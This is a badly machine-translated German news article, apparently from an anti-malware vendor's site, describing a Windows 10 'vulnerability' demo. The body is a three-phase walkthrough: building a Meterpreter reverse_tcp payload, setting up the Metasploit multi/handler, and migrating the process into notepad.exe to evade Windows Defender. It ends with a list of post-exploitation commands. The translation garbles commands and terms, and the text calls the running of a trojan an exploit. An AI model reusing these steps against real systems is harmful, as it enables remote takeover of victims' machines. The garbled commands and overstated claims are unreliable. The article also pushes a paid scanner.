Zuhause > Cyber ​​Aktuelles > Kritisches Windows 10 Sicherheitsanfälligkeit - Multihandler Exploit
CYBER NEWS

Kritisch Windows 10 Sicherheitsanfälligkeit - Multihandler Exploit

Name Trojan:Win32 / Swrort
Art Trojan
kurze Beschreibung Lese- und Schreibberechtigungen in Windows 10. Ermöglicht der Angreifer zu anderen PC auf den infizierten einem angeschlossenen infizieren.
Symptome Erscheinung einer fremden .exe-Datei.
Verteilungsmethode Spam-Mails. MiTM attacks, Schadweiterleitungen.
Werkzeug zur Erkennung Laden Sie SpyHunter, zu sehen, ob Ihr System wurde Betroffen von Trojan:Win32 / Swrort

p15_0000Eine gefährliche Sicherheitslücke in Windows entdeckt 10, Verwendung einer Trojan:Win32 / Swrort um Windows Defender zu umgehen und sich Lese- und Schreibrechte. Anonymous Forscher hat die Schwachstelle von einem Kanal gezeigt, namens Metasploitstation. Er zeigt 3 Phasen, in denen Sie vorbei an Windows-verrutschen kann 10 Verteidigung. Es gab keine Informationen bis jetzt, ob dieser Exploit wurde behoben oder entdeckt keine.

Fenster 10 Multihandler Infektion Exploit – Wie es geht?

Im Video, die technisch versierte Benutzer gezeigt, eine Simulation einer Datei '123.EXE ", die er schafft und führt, als ob es in der realen Welt als Anhang an eine E-Mail mit einer anderen Methode geöffnet oder ausgeführt. Wir haben beschlossen, den Infektionsprozess in drei Phasen unterteilen, damit Sie die Methoden besser zu verstehen.

Phase 1: Dateivorbereitung

Der Hacker schafft eine Nutzlast mit dieser Konfiguration in einer Linux-Umgebung:

msfpaayload windows / Meter natürlichen / reverse_tcp lhost = LPORT = x> / home / awer / New Ordner / 123.EXE

portnumber1* – Dies ist der Port für den Angriff benutzt. Es kann jeder Port sein (4444, 4324, usw.). Wir haben portnumber1 geschrieben, da er verwendet eine zweite Portnummer, die wir mit dem Namen später.

Nach dieser Phase abgeschlossen ist, und die Datei wird durch den Angreifer geschaffen und prallt auf den Benutzersystem, Der Angreifer kann gehen Sie zur Phase 2.

Phase 2: Mit Hilfe der Exploit.

An dieser Stelle, der Angreifer nutzt Multihandler, damit Sie sie sehen können die .exe und profitieren Sie von der Exploit, um eine aktive Sitzung zu öffnen(verbinden) dem Opfer PC.

Dies kann passieren, mit den aktuellen Befehlszeilen:

msfconsole (Um die Konsole zu starten. Eröffnet 'Ärzte ohne Grenzen>' Schnittstelle)

In 'Ärzte ohne Grenzen' kann der Angreifer die folgenden Befehle aus:

MSF> Verwendung nutzen / multi / Handler
set lhost "Opfer IP-Adresse’
Stellen lport 'portnumber1’

Danach, Der Angreifer führt die Nutzlast, um eine Sitzung zu etablieren:

msfexploit(Handler)> set Nutzlast windows / Meterpreter / reverse_tcp

Um zu überprüfen, ob eine aktive Sitzung ist möglich, der Angreifer schreibt den Befehl msfexploit(Handler)> Show-Optionen, die es ihm ermöglichen, das zu sehen

→EXITFUNC Prozess Ja-Ausgang Technik(akzeptiert: seh, Gewinde..)
Lhost Opfer IP-Adresse yes Der Listen-Port
LPORT portnumber1 yes Das hört Adresse

Dies erlaubt ihm, um zu sehen, dass er richtig konfiguriert und die Einstellungen mit der tatsächlichen Infektion des Computers gehen.

Phase 3: Infektion

Der Befehl, der Angreifer nutzt, um eine aktive Sitzung zu initiieren mit dem Opfer um 'Nutzen'. Nach Ausführung dieses Befehls, die Datei '123.EXE' mit dieser Antwort zurückgegeben:

[*] Schritte rückwärts Handler auf
[*] Starten des Payload-Handler…

An dieser Stelle, die ausführbare Datei auf dem Windows-Rechner gestartet. Trotz der Tatsache, dass Windows Defender Software ausgeführt wurde, es hat nicht den Angriff zu stoppen. Jedoch, wenn auf Viren überprüft, Windows Antivirus-Programm sofort erkannt "123.EXE 'als Trojan:Win32 / Swrort.A.

Um nicht entdeckt zu werden, der Angreifer verwendet eine Taktik, genannt migrierenden die eine Datei "notepad.exe", die die aktive Sitzung von '123.EXE "beim Verbinden wandert in dieser Datei erstellt. Dies wurde mit dem Befehl getan:

Meterpreter> laufen post / windows / Verwaltung / migrate

Nach der Migration des Prozesses und immer wieder dieselben Simulations aber unter Verwendung von (anderen Port), der Angreifer war wieder. Dieses Mal, wenn der Angreifer in der PC bekam er nicht erkannt, selbst nachdem Windows Defender hat eine Scan und die Datei '123.EXE "noch auf dem Computer vorhanden war.

Von dort, der Angreifer zeigte vollen Lese- und schrieb Berechtigungen, indem Sie einen neuen Ordner mit einem neuen Textdokument. Soweit wir wissen, die wichtigsten Befehle, die nach der Verbindung verwendet werden können, sind:

> sysinfo -, um das System-Version und Informationen zu zeigen.
>dir :/ – um jede Zielverzeichnis öffnen.
> Shell -, um die Windows-Version und andere Informationen zu zeigen.
> getwid - zeigt Windows-ID.
> ps -aux - zeigt alle .exe-Dateien in der Windows-Task-Manager ausgeführt.
> ifconfig - zeigt Informationen über Schnittstellen (IP-Adressen und andere Informationen). Dieser Befehl gibt dem Angreifer die Informationen zu einem anderen Computer, der auf die gleiche Netzwerkkarte und VLAN mit der infizierten PC zu verbinden. Dies kann bei solchen Angriff sehr verheerend für Haus oder Büro-Netzwerke sein ist gut organisiert.

Fenster 10 Exploits – Abschluss

Es gibt keine aktuellen Informationen, ob diese zu nutzen, wurde behoben, aber wie mit jeder anderen Software, es kann mehr ungedeckte diejenigen sein. Deshalb ist, falls Sie mit Windows arbeiten 10, empfehlen wir zum Herunterladen und Installieren fortschrittliche Malware-Schutz-Programm. Es wird aktiv zu schützen Sie und aktualisieren sich regelmäßig mit den neuesten Bedrohungen. Auch, solches Programm hat aktive Schilde, die sofort nicht autorisierte Verbindungen erkennen.

donload_now_250
Spy Hunter Scanner nur die Bedrohung erkennen. Wenn Sie wollen, dass die Bedrohung automatisch entfernt wird, Müssen sie die vollversion des anti-malware tools kaufen.Erfahren Sie mehr über SpyHunter Anti-Malware-Tool / Wie SpyHunter Deinstallieren

Berta Bilbao

Berta ist ein spezieller Malware-Forscher, Träumen für eine sichere Cyberspace. Ihre Faszination für die IT-Sicherheit begann vor ein paar Jahren, wenn eine Malware sie aus ihrem eigenen Computer gesperrt.

Mehr Beiträge

Schreibe einen Kommentar

Ihre E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert *

Diese Website verwendet Cookies, um die Benutzererfahrung zu verbessern. Durch die Nutzung unserer Website erklären Sie sich mit allen Cookies gemäß unserer Datenschutz-Bestimmungen.
Genau